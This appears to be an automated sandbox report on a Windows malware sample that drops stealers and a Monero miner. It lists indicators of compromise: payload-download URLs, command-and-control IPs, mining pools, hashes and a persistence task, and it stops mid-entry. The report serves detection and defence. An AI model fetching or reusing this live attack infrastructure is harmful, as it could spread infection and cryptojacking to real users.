C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | 100% | Joe Sandbox ML |
C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe | 91% | ReversingLabs | Win64.Packed.Generic
C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | 88% | ReversingLabs | Win32.Trojan.LummaStealer
C:\Users\user\AppData\Local\Temp\BroomSetup.exe | 75% | ReversingLabs | Win32.Trojan.Malgent
C:\Users\user\AppData\Local\Temp\FourthX.exe | 91% | ReversingLabs | Win64.Packed.Generic
C:\Users\user\AppData\Local\Temp\InstallSetup4.exe | 88% | ReversingLabs | Win32.Trojan.Stealerc
C:\Users\user\AppData\Local\Temp\nsr70E6.tmp\INetC.dll | 0% | ReversingLabs |
C:\Windows\Temp\gbfbijmbpkdw.sys | 5% | ReversingLabs |
                        No Antivirus matches
Source | Detection | Scanner | Label | Link
Name | IP | Active | Malicious | Antivirus Detection | Reputation
pastebin.com | 104.20.3.235 | true | true | | unknown
xmr-eu1.nanopool.org | 51.15.193.130 | true | true | | unknown
xmr-eu2.nanopool.org | 51.68.137.186 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://185.172.128.109/syncUpd.exe | false | Avira URL Cloud: safe | unknown
http://5.42.64.33/ping.php?substr=four | false | Avira URL Cloud: safe | unknown
http://185.172.128.127/syncUpd.exe | false | Avira URL Cloud: safe | unknown
http://185.172.128.90/cpa/ping.php?substr=four&s=ab | false | Avira URL Cloud: safe | unknown
https://pastebin.com/raw/2HQ8Rbid | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
IP | Domain | Country | ASN | ASN Name | Malicious
185.172.128.90 | unknown | Russian Federation | 50916 | NADYMSS-ASRU | false
104.20.3.235 | pastebin.com | United States | 13335 | CLOUDFLARENETUS | true
51.15.58.224 | unknown | France | 12876 | OnlineSASFR | false
185.172.128.127 | unknown | Russian Federation | 50916 | NADYMSS-ASRU | false
51.195.138.197 | unknown | France | 16276 | OVHFR | false
5.42.64.33 | unknown | Russian Federation | 39493 | RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU | false
185.172.128.109 | unknown | Russian Federation | 50916 | NADYMSS-ASRU | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1480049
Start date and time: 2024-07-24 14:30:15 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 13m 11s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 48
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 25C1.exe
Detection: MAL
Classification: mal100.troj.evad.mine.winEXE@67/30@3/7
EGA Information:
• Successful, ratio: 87.5%
HCA Information:
• Successful, ratio: 88%
• Number of executed functions: 111
• Number of non-executed functions: 62
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target 25C1.exe, PID 7600 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size getting too big, too many NtCreateKey calls found
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtQueryValueKey calls found
• VT rate limit hit for: 25C1.exe
Time | Type | Description
08:31:08 | API Interceptor | 1x Sleep call for process: FourthX.exe modified
08:31:12 | API Interceptor | 8x Sleep call for process: 288c47bbc1871b439df19ff4df68f076.exe modified
08:31:12 | API Interceptor | 77x Sleep call for process: powershell.exe modified
13:31:13 | Task Scheduler | Run new task: MalayamaraUpdate path: "C:\Users\user\AppData\Local\Temp\Updater.exe"
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.172.128.90 | LOn3Ws0C6v.exe | malicious | Unknown | 185.172.128.90/cpa/ping.php?substr=five&s=ab
185.172.128.90 | LOn3Ws0C6v.exe | malicious | Unknown | 185.172.128.90/cpa/ping.php?substr=five&s=ab
185.172.128.90 | 5oXJ4R0xsz.exe | malicious | GCleaner, Nymaim | 185.172.128.90/cpa/name.php
185.172.128.90 | SecuriteInfo.com.Win32.CrypterX-gen.21396.26717.exe | malicious | GCleaner, Nymaim | 185.172.128.90/cpa/name.php
185.172.128.90 | 4bMOQM5bBW.exe | malicious | GCleaner, Nymaim | 185.172.128.90/cpa/name.php
185.172.128.90 | 38vkspMDH4.exe | malicious | GCleaner, Nymaim | 185.172.128.90/cpa/name.php
185.172.128.90 | zv0DDKbje3.exe | malicious | GCleaner, Nymaim | 185.172.128.90/cpa/name.php
185.172.128.90 | kyaOzGMoxp.exe | malicious | GCleaner, Nymaim | 185.172.128.90/cpa/name.php
185.172.128.90 | SecuriteInfo.com.Trojan.005afea61.15178.32092.exe | malicious | GCleaner | 185.172.128.90/cpa/ping.php?substr=one&s=two
185.172.128.90 | SecuriteInfo.com.Win32.CrypterX-gen.24228.21937.exe | malicious | GCleaner | 185.172.128.90/cpa/ping.php?substr=one&s=two
104.20.3.235 | New Voicemail Invoice 64746w .js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
104.20.3.235 | Invoice-883973938.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
104.20.3.235 | 2024 12_59_31 a.m..js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
104.20.3.235 | PendingInvoiceBankDetails.JS.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
51.15.58.224 | 8EbwkHzF0i.exe | malicious | Xmrig, zgRAT |
51.15.58.224 | file.exe | malicious | Glupteba, SmokeLoader, Xmrig |
51.15.58.224 | file.exe | malicious | Parallax RAT, Phonk Miner, Xmrig |
51.15.58.224 | file.exe | malicious | Parallax RAT, Phonk Miner, Xmrig |
51.15.58.224 | file.exe | malicious | Phonk Miner, Xmrig |
51.15.58.224 | file.exe | malicious | Xmrig |
51.15.58.224 | file.exe | malicious | Xmrig |
51.15.58.224 | file.exe | malicious | Xmrig |
51.15.58.224 | file.exe | malicious | Phonk Miner, Xmrig |
51.15.58.224 | file.exe | malicious | Xmrig |
Columns: Match, Associated Sample Name / URL, SHA 256, Detection, Threat Name, Link, Context
Match: pastebin.com
• Sample/URL: 88YW43jlqt.exe, Detection: malicious, Threat Name: DCRat, Context: 172.67.19.24
• Sample/URL: installer.exe, Detection: malicious, Threat Name: LummaC, PureLog Stealer, Xmrig, zgRAT, Context: 104.20.3.235
• Sample/URL: aabJ5lAG3l.doc, Detection: malicious, Threat Name: Unknown, Context: 104.20.3.235
• Sample/URL: updater.exe, Detection: malicious, Threat Name: Xmrig, Context: 104.20.4.235
• Sample/URL: DeqcE30sLb.exe, Detection: malicious, Threat Name: DCRat, Context: 172.67.19.24
• Sample/URL: Mx0UGSI897.exe, Detection: malicious, Threat Name: DCRat, Context: 104.20.3.235
• Sample/URL: eE1xnwas4F.exe, Detection: malicious, Threat Name: LummaC, Context: 104.20.3.235
• Sample/URL: conhost.exe, Detection: malicious, Threat Name: Xmrig, Context: 104.20.3.235
• Sample/URL: SecuriteInfo.com.Win64.Evo-gen.29709.21053.exe, Detection: malicious, Threat Name: Unknown, Context: 104.20.3.235
• Sample/URL: Software1.30.1.exe, Detection: malicious, Threat Name: RedLine, Xmrig, Context: 172.67.19.24
Match: xmr-eu1.nanopool.org
• Sample/URL: file.exe, Detection: malicious, Threat Name: Amadey, Babadeda, Stealc, Vidar, Xmrig, Context: 54.37.137.114
• Sample/URL: Loader.exe, Detection: malicious, Threat Name: LummaC, Xmrig, Context: 212.47.253.124
• Sample/URL: updater.exe, Detection: malicious, Threat Name: Xmrig, Context: 141.94.23.83
• Sample/URL: SecuriteInfo.com.Win64.RATX-gen.29355.29242.exe, Detection: malicious, Threat Name: AsyncRAT, Nbminer, Xmrig, Context: 54.37.232.103
• Sample/URL: serrrr.exe, Detection: malicious, Threat Name: Xmrig, Context: 51.15.193.130
• Sample/URL: 2mim34IfQZ.exe, Detection: malicious, Threat Name: AsyncRAT, PureLog Stealer, Xmrig, zgRAT, Context: 212.47.253.124
• Sample/URL: gq83mrprwy.exe, Detection: malicious, Threat Name: Xmrig, Context: 212.47.253.124
• Sample/URL: SecuriteInfo.com.Win64.TrojanX-gen.22735.27744.exe, Detection: malicious, Threat Name: Xmrig, Context: 51.15.193.130
• Sample/URL: ft1i6jvAdD.exe, Detection: malicious, Threat Name: Xmrig, Context: 141.94.23.83
• Sample/URL: vS3C07uH19.exe, Detection: malicious, Threat Name: Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Xmrig, Context: 51.255.34.118
Match: xmr-eu2.nanopool.org
• Sample/URL: MCYq2AqNU0.exe, Detection: malicious, Threat Name: Glupteba, LummaC Stealer, SmokeLoader, Stealc, Xmrig, Context: 51.195.43.17
• Sample/URL: zg9ZjvXyS0.exe, Detection: malicious, Threat Name: Xmrig, Context: 51.255.34.80
• Sample/URL: file.exe, Detection: malicious, Threat Name: Amadey, Djvu, Fabookie, RedLine, SmokeLoader, Xmrig, Context: 51.15.61.114
• Sample/URL: 754VzzNQIU.exe, Detection: malicious, Threat Name: Amadey, Djvu, Fabookie, RedLine, SmokeLoader, Xmrig, Context: 92.222.217.165
• Sample/URL: rZN9Qy7WJN.exe, Detection: malicious, Threat Name: Amadey, Djvu, Fabookie, RedLine, SmokeLoader, Xmrig, Context: 51.15.55.100
• Sample/URL: file.exe, Detection: malicious, Threat Name: Amadey, Djvu, Fabookie, SmokeLoader, Xmrig, Context: 51.15.55.162
• Sample/URL: file.exe, Detection: malicious, Threat Name: Amadey, Djvu, Fabookie, SmokeLoader, Xmrig, Context: 51.15.67.17
• Sample/URL: ChromeUA.exe, Detection: malicious, Threat Name: Xmrig, Context: 92.222.217.165
• Sample/URL: file.exe, Detection: malicious, Threat Name: Amadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, RedLine, SmokeLoader, Context: 152.228.216.245
• Sample/URL: file.exe, Detection: malicious, Threat Name: Amadey, Fabookie, Glupteba, Nymaim, SmokeLoader, Xmrig, Context: 51.15.67.17
Columns: Match, Associated Sample Name / URL, SHA 256, Detection, Threat Name, Link, Context
Match: NADYMSS-ASRU
• Sample/URL: LOn3Ws0C6v.exe, Detection: malicious, Threat Name: Unknown, Context: 185.172.128.109
• Sample/URL: LOn3Ws0C6v.exe, Detection: malicious, Threat Name: Unknown, Context: 185.172.128.109
• Sample/URL: 5oXJ4R0xsz.exe, Detection: malicious, Threat Name: GCleaner, Nymaim, Context: 185.172.128.69
• Sample/URL: tedfd.exe, Detection: malicious, Threat Name: Atlantida Stealer, PureLog Stealer, Context: 185.172.128.95
• Sample/URL: mlk3kK6uLZ.exe, Detection: malicious, Threat Name: Amadey, Mars Stealer, PureLog Stealer, Quasar, RedLine, Stealc, Vidar, Context: 185.172.128.33
• Sample/URL: SecuriteInfo.com.Win32.CrypterX-gen.21396.26717.exe, Detection: malicious, Threat Name: GCleaner, Nymaim, Context: 185.172.128.69
• Sample/URL: 4bMOQM5bBW.exe, Detection: malicious, Threat Name: GCleaner, Nymaim, Context: 185.172.128.69
• Sample/URL: 38vkspMDH4.exe, Detection: malicious, Threat Name: GCleaner, Nymaim, Context: 185.172.128.69
• Sample/URL: zv0DDKbje3.exe, Detection: malicious, Threat Name: GCleaner, Nymaim, Context: 185.172.128.90
• Sample/URL: kyaOzGMoxp.exe, Detection: malicious, Threat Name: GCleaner, Nymaim, Context: 185.172.128.69
Match: OnlineSASFR
• Sample/URL: RPHbzz3JqY.exe, Detection: malicious, Threat Name: ScreenConnect Tool, PureLog Stealer, RedLine, Xmrig, zgRAT, Context: 212.47.253.124
• Sample/URL: https://agana281.xyz/garanti/, Detection: malicious, Threat Name: Unknown, Context: 51.159.84.191
• Sample/URL: yt7dW9nyJK.exe, Detection: malicious, Threat Name: WhiteSnake Stealer, XWorm, Context: 51.158.147.144
• Sample/URL: 0SpHek7Jd8.elf, Detection: malicious, Threat Name: Unknown, Context: 51.159.77.156
• Sample/URL: http://frhb68273ds.ikexpress.com, Detection: malicious, Threat Name: Unknown, Context: 51.159.84.191
• Sample/URL: http://nys-ns.com/, Detection: malicious, Threat Name: Unknown, Context: 51.159.84.191
• Sample/URL: http://nys-ns.com/, Detection: malicious, Threat Name: Unknown, Context: 51.159.84.191
• Sample/URL: faBNhIKHq4.elf, Detection: malicious, Threat Name: Mirai, Gafgyt, Okiru, Context: 151.115.223.78
• Sample/URL: SecuriteInfo.com.Riskware.OfferCore.702.11507.exe, Detection: malicious, Threat Name: PrivateLoader, PureLog Stealer, Context: 212.129.33.59
• Sample/URL: SecuriteInfo.com.Riskware.OfferCore.5002.4698.exe, Detection: malicious, Threat Name: PrivateLoader, Context: 212.129.33.59
Match: NADYMSS-ASRU
• Sample/URL: LOn3Ws0C6v.exe, Detection: malicious, Threat Name: Unknown, Context: 185.172.128.109
• Sample/URL: LOn3Ws0C6v.exe, Detection: malicious, Threat Name: Unknown, Context: 185.172.128.109
• Sample/URL: 5oXJ4R0xsz.exe, Detection: malicious, Threat Name: GCleaner, Nymaim, Context: 185.172.128.69
• Sample/URL: tedfd.exe, Detection: malicious, Threat Name: Atlantida Stealer, PureLog Stealer, Context: 185.172.128.95
• Sample/URL: mlk3kK6uLZ.exe, Detection: malicious, Threat Name: Amadey, Mars Stealer, PureLog Stealer, Quasar, RedLine, Stealc, Vidar, Context: 185.172.128.33
• Sample/URL: SecuriteInfo.com.Win32.CrypterX-gen.21396.26717.exe, Detection: malicious, Threat Name: GCleaner, Nymaim, Context: 185.172.128.69
• Sample/URL: 4bMOQM5bBW.exe, Detection: malicious, Threat Name: GCleaner, Nymaim, Context: 185.172.128.69
• Sample/URL: 38vkspMDH4.exe, Detection: malicious, Threat Name: GCleaner, Nymaim, Context: 185.172.128.69
• Sample/URL: zv0DDKbje3.exe, Detection: malicious, Threat Name: GCleaner, Nymaim, Context: 185.172.128.90
• Sample/URL: kyaOzGMoxp.exe, Detection: malicious, Threat Name: GCleaner, Nymaim, Context: 185.172.128.69
Match: OVHFR
• Sample/URL: nJC3400-GS SICO NEW ORLEANS.pif.exe, Detection: malicious, Threat Name: Unknown, Context: 167.114.222.56
• Sample/URL: https://forms.office.com/r/tV6LkCsNt1, Detection: malicious, Threat Name: Unknown, Context: 51.75.86.98
• Sample/URL: 231210-02-AgentTesla-18717f.exe, Detection: malicious, Threat Name: AgentTesla, Context: 51.79.21.111
• Sample/URL: 231210-10-Creal-33652f.exe, Detection: malicious, Threat Name: Creal Stealer, Context: 51.91.7.6
• Sample/URL: Purchase Order POT-247110.scr.exe, Detection: malicious, Threat Name: Snake Keylogger, VIP Keylogger, Context: 167.114.222.56
• Sample/URL: REQUEST FOR QUOTATION (RFQ)-124425.scr.gz.exe, Detection: malicious, Threat Name: PureLog Stealer, zgRAT, Context: 167.114.222.56
• Sample/URL: RPHbzz3JqY.exe, Detection: malicious, Threat Name: ScreenConnect Tool, PureLog Stealer, RedLine, Xmrig, zgRAT, Context: 146.59.154.106
• Sample/URL: UHXVupzN3tv2QqA.exe, Detection: malicious, Threat Name: AgentTesla, Context: 51.77.72.165
• Sample/URL: uailDN14HrnHUF8.exe, Detection: malicious, Threat Name: AgentTesla, Context: 51.77.72.165
• Sample/URL: getscreen-511588515.exe, Detection: malicious, Threat Name: Unknown, Context: 51.89.95.37
Match: CLOUDFLARENETUS
• Sample/URL: https://forms.office.com/r/tV6LkCsNt1, Detection: malicious, Threat Name: Unknown, Context: 104.18.36.155
• Sample/URL: abrirpdf_45868.msi, Detection: malicious, Threat Name: HTMLPhisher, Context: 172.67.150.91
• Sample/URL: 231210-10-Creal-33652f.exe, Detection: malicious, Threat Name: Creal Stealer, Context: 172.67.74.152
• Sample/URL: http://www.agrimarkeurope.com/feed-commodities., Detection: malicious, Threat Name: Unknown, Context: 188.114.96.3
• Sample/URL: 231210-04-AgentTesla-38a0d6.exe, Detection: malicious, Threat Name: AgentTesla, Context: 162.159.137.232
• Sample/URL: NgddPMMewg.exe, Detection: malicious, Threat Name: CobaltStrike, Context: 188.114.97.3
• Sample/URL: fLnj4EeH6V.rtf, Detection: malicious, Threat Name: Unknown, Context: 188.114.97.3
• Sample/URL: https://presentationprojectconvini.dorik.io/, Detection: malicious, Threat Name: Unknown, Context: 172.67.72.224
• Sample/URL: 1f4ef767f0144f8b485bc6ef31247f6b95f68df95a649d9902f885e79408e114.exe, Detection: malicious, Threat Name: Babuk, Bdaejec, Djvu, Context: 188.114.97.3
• Sample/URL: SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf, Detection: malicious, Threat Name: Snake Keylogger, VIP Keylogger, Context: 188.114.96.3
No context
Columns: Match, Associated Sample Name / URL, SHA 256, Detection, Threat Name, Link, Context
Match: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe
• Sample/URL: 7vMi37TpMO.exe, Detection: malicious, Threat Name: LummaC, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Socks5Systemz, Stealc
• Sample/URL: EGpGxFlJO8.exe, Detection: malicious, Threat Name: Glupteba, Mars Stealer, SmokeLoader, Stealc, Vidar
• Sample/URL: 906o5yr1NE.exe, Detection: malicious, Threat Name: LummaC, Glupteba, LummaC Stealer, SmokeLoader, Stealc, Xmrig
• Sample/URL: BWV4hz5GdR.exe, Detection: malicious, Threat Name: Glupteba, LummaC Stealer, SmokeLoader, Stealc, Xmrig
• Sample/URL: lxGAurRKvR.exe, Detection: malicious, Threat Name: Glupteba, LummaC Stealer, SmokeLoader, Stealc, Xmrig
• Sample/URL: PjgTyZiVh0.exe, Detection: malicious, Threat Name: LummaC, Glupteba, LummaC Stealer, SmokeLoader, Socks5Systemz, Stealc, Xmrig
• Sample/URL: xZnG1FFx7L.exe, Detection: malicious, Threat Name: LummaC, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Socks5Systemz, Stealc
• Sample/URL: KWwpSm0Cec.exe, Detection: malicious, Threat Name: LummaC, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Stealc, Vidar
• Sample/URL: 7leZRNBofA.exe, Detection: malicious, Threat Name: LummaC, Glupteba, LummaC Stealer, SmokeLoader, Socks5Systemz, Stealc
• Sample/URL: SKHOtnHl7J.exe, Detection: malicious, Threat Name: LummaC, Glupteba, LummaC Stealer, SmokeLoader, Socks5Systemz, Stealc
Match: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
• Sample/URL: 7vMi37TpMO.exe, Detection: malicious, Threat Name: LummaC, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Socks5Systemz, Stealc
• Sample/URL: EGpGxFlJO8.exe, Detection: malicious, Threat Name: Glupteba, Mars Stealer, SmokeLoader, Stealc, Vidar
• Sample/URL: 906o5yr1NE.exe, Detection: malicious, Threat Name: LummaC, Glupteba, LummaC Stealer, SmokeLoader, Stealc, Xmrig
• Sample/URL: BWV4hz5GdR.exe, Detection: malicious, Threat Name: Glupteba, LummaC Stealer, SmokeLoader, Stealc, Xmrig
• Sample/URL: lxGAurRKvR.exe, Detection: malicious, Threat Name: Glupteba, LummaC Stealer, SmokeLoader, Stealc, Xmrig
• Sample/URL: PjgTyZiVh0.exe, Detection: malicious, Threat Name: LummaC, Glupteba, LummaC Stealer, SmokeLoader, Socks5Systemz, Stealc, Xmrig
• Sample/URL: xZnG1FFx7L.exe, Detection: malicious, Threat Name: LummaC, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Socks5Systemz, Stealc
• Sample/URL: KWwpSm0Cec.exe, Detection: malicious, Threat Name: LummaC, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Stealc, Vidar
• Sample/URL: 7leZRNBofA.exe, Detection: malicious, Threat Name: LummaC, Glupteba, LummaC Stealer, SmokeLoader, Socks5Systemz, Stealc
• Sample/URL: SKHOtnHl7J.exe, Detection: malicious, Threat Name: LummaC, Glupteba, LummaC Stealer, SmokeLoader, Socks5Systemz, Stealc
                                                                                          Process:C:\Users\user\AppData\Local\Temp\FourthX.exe
                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):2654720
                                                                                          Entropy (8bit):6.545978188908966
                                                                                          Encrypted:false
                                                                                          SSDEEP:49152:iVkNC5+XxkQKlb0FjgS0+cywnZLIJK2egUmFbcP9ovzmiPKkv/m63KEll25OcXoZ:iVkYYXc4FUoNeIo2eaZdScKS/mQ/K6
                                                                                          MD5:B03886CB64C04B828B6EC1B2487DF4A4
                                                                                          SHA1:A7B9A99950429611931664950932F0E5525294A4
                                                                                          SHA-256:5DFAA8987F5D0476B835140D8A24FB1D9402E390BBE92B8565DA09581BD895FC
                                                                                          SHA-512:21D1A5A4A218411C2EC29C9CA34CE321F6514E7CA3891EDED8C3274AEB230051661A86EDA373B9A006554E067DE89D816AA1FA864ACF0934BBB16A6034930659
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 91%
                                                                                          Joe Sandbox View:
• Filename: 7vMi37TpMO.exe, Detection: malicious
• Filename: EGpGxFlJO8.exe, Detection: malicious
• Filename: 906o5yr1NE.exe, Detection: malicious
• Filename: BWV4hz5GdR.exe, Detection: malicious
• Filename: lxGAurRKvR.exe, Detection: malicious
• Filename: PjgTyZiVh0.exe, Detection: malicious
• Filename: xZnG1FFx7L.exe, Detection: malicious
• Filename: KWwpSm0Cec.exe, Detection: malicious
• Filename: 7leZRNBofA.exe, Detection: malicious
• Filename: SKHOtnHl7J.exe, Detection: malicious
                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...}..e.........."......n....(.....@..........@..............................(...........`.................................................0...<.....(.......(...............(.x...............................(.......8..............X............................text...vm.......n.................. ..`.rdata..x............r..............@..@.data.....'.......'.................@....pdata........(......d(.............@..@.00cfg........(......f(.............@..@.tls..........(......h(.............@....rsrc.........(......j(.............@..@.reloc..x.....(.......(.............@..B........................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\Desktop\25C1.exe
                                                                                          File Type:CSV text
                                                                                          Category:dropped
                                                                                          Size (bytes):425
                                                                                          Entropy (8bit):5.353683843266035
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                                                          MD5:859802284B12C59DDBB85B0AC64C08F0
                                                                                          SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                                                          SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                                                          SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                                                          Malicious:true
                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):2224
                                                                                          Entropy (8bit):5.354655674834519
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:CWSU4xympjgZ9tz4RIoUl8NPdMo7u1iMugeC/ZUcUyu0lhV:CLHxvCZfIfSKl3OugIt01
                                                                                          MD5:CFB43BDF28987239F0528E539CF1589D
                                                                                          SHA1:8944B8E2EDC4A27F35D811D3445322124EDC512B
                                                                                          SHA-256:BDA66CC6F9BCB3688FC8DDA7DFDC5954582F9CDE26D7A76A23B14DA99B7C492C
                                                                                          SHA-512:792FAEABAA9D5B0C5943AE64D3169A6E39F49962829DA98FF6B466737D6CC40F78EE23C5256175BBE2F1B9F3FB411CD79110C85575BA41138C5C60F33A5DD92A
                                                                                          Malicious:false
                                                                                          Preview:@...e...........................................................P................1]...E.....m.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):64
                                                                                          Entropy (8bit):1.1940658735648508
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:NlllulDm0ll//Z:NllU6cl/
                                                                                          MD5:DA1F22117B9766A1F0220503765A5BA5
                                                                                          SHA1:D35597157EFE03AA1A88C1834DF8040B3DD3F3CB
                                                                                          SHA-256:BD022BFCBE39B4DA088DDE302258AE375AAFD6BDA4C7B39A97D80C8F92981C69
                                                                                          SHA-512:520FA7879AB2A00C86D9982BB057E7D5E243F7FC15A12BA1C823901DC582D2444C76534E955413B0310B9EBD043400907FD412B88927DAD07A1278D3B667E3D9
                                                                                          Malicious:false
                                                                                          Preview:@...e.................................R..............@..........
                                                                                          Process:C:\Users\user\Desktop\25C1.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):4315536
                                                                                          Entropy (8bit):7.986023355020629
                                                                                          Encrypted:false
                                                                                          SSDEEP:98304:Ox34CiKzvjm7SLtMZTm7LASnwWEuCSeZHe31O6Y/qHYq9Pei:OB4yzvjmEtMf+wT3Us6Y/qHYKB
                                                                                          MD5:D122F827C4FC73F9A06D7F6F2D08CD95
                                                                                          SHA1:CD1D1DC2C79C0EE394B72EFC264CFD54D96E1EE5
                                                                                          SHA-256:B7A6DCFDD64173ECBCEF562FD74AEE07F3639FA863BD5740C7E72DDC0592B4FC
                                                                                          SHA-512:8755979D7383D6CB5E7D63798C9CA8B9C0FAEEC1FE81907FC75BBBB7BE6754AB7B5A09A98492A27F90E3F26951B6891C43D8ACD21414FB603CD86A4E10DAC986
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 88%
                                                                                          Joe Sandbox View:
                                                                                           • Filename: 7vMi37TpMO.exe, Detection: malicious
                                                                                           • Filename: EGpGxFlJO8.exe, Detection: malicious
                                                                                           • Filename: 906o5yr1NE.exe, Detection: malicious
                                                                                           • Filename: BWV4hz5GdR.exe, Detection: malicious
                                                                                           • Filename: lxGAurRKvR.exe, Detection: malicious
                                                                                           • Filename: PjgTyZiVh0.exe, Detection: malicious
                                                                                           • Filename: xZnG1FFx7L.exe, Detection: malicious
                                                                                           • Filename: KWwpSm0Cec.exe, Detection: malicious
                                                                                           • Filename: 7leZRNBofA.exe, Detection: malicious
                                                                                           • Filename: SKHOtnHl7J.exe, Detection: malicious
                                                                                           Preview:
                                                                                          Process:C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):4979200
                                                                                          Entropy (8bit):6.419395528077673
                                                                                          Encrypted:false
                                                                                          SSDEEP:49152:90oSiZ63YBmS9+rCgpvH8la0ZxRh+caGnj8HEQUhexTUT+1d/2/Tbt:0Ula0cGwXUheabt
                                                                                          MD5:5E94F0F6265F9E8B2F706F1D46BBD39E
                                                                                          SHA1:D0189CBA430F5EEA07EFE1AB4F89ADF5AE2453DB
                                                                                          SHA-256:50A46B3120DA828502EF0CABA15DEFBAD004A3ADB88E6EACF1F9604572E2D503
                                                                                          SHA-512:473DFA66A36FEED9B29A43245074141478327CE22BA7CCE512599379DCB783B4D665E2D65C5E9750B988C7ED8F6C3349A7A12D4B8B57C89840EEE6CA6E1A30CD
                                                                                          Malicious:true
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe, Author: Joe Security
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 75%
                                                                                           Preview:
                                                                                          Process:C:\Users\user\Desktop\25C1.exe
                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):2654720
